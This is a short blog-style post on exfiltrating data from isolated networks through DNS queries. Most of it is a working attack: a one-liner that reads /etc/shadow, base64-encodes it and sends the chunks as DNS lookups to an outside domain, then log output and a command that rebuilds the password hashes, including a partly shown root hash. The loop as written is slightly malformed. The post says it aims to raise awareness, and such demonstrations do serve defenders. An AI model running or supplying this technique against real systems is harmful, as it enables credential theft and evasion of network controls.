I often spend some time in highly isolated and secured networks.
Companies spend a lot of money to protect their sensitive data.

But so far I see often that restrictions are not tight enough.

Since layer7 inspection of https traffic has become a standard, DNS filtering has not.

Getting data out of secure zones by DNS requests is quite easy, so lets start with this example.

What you need to get it running:

  • A server within a secured Zone to push some data out.
  • A Server in the internet where you can read the logs.


So lets push out the data from secure zone:

cat /etc/shadow | base64 -w63 | while read line
   host  -tA $L.debug2.org

This command encoded and transferred the linux password file to my dns server, listening at IP

On the target side, I easily can reconstruct the data:

[root@ns ~]# grep debug2.org /var/log/messages | tail -2
Oct 19 08:50:27 ns named[1017]: client (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 pan named[1017]: client (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied

[root@pan ~]# grep debug2.org /var/log/messages | cut -d'(' -f2- | cut -d'.' -f1 | base64 -d root:$6$QMXJFcGY$TkVB1fdrSBzM9nlhO...rsPIc3F.35TN2sloEuQofCFO4SSE9Z3/:17760:0:99999:7::: [...] _chrony:*:17760:0:99999:7:::


Sometimes, character cases get converted to capital or verse, but in this case it is easy to do the same with base32 or uuencode.

This is not mentioned to be used against the law, but should help to get aware of security ... and its problems.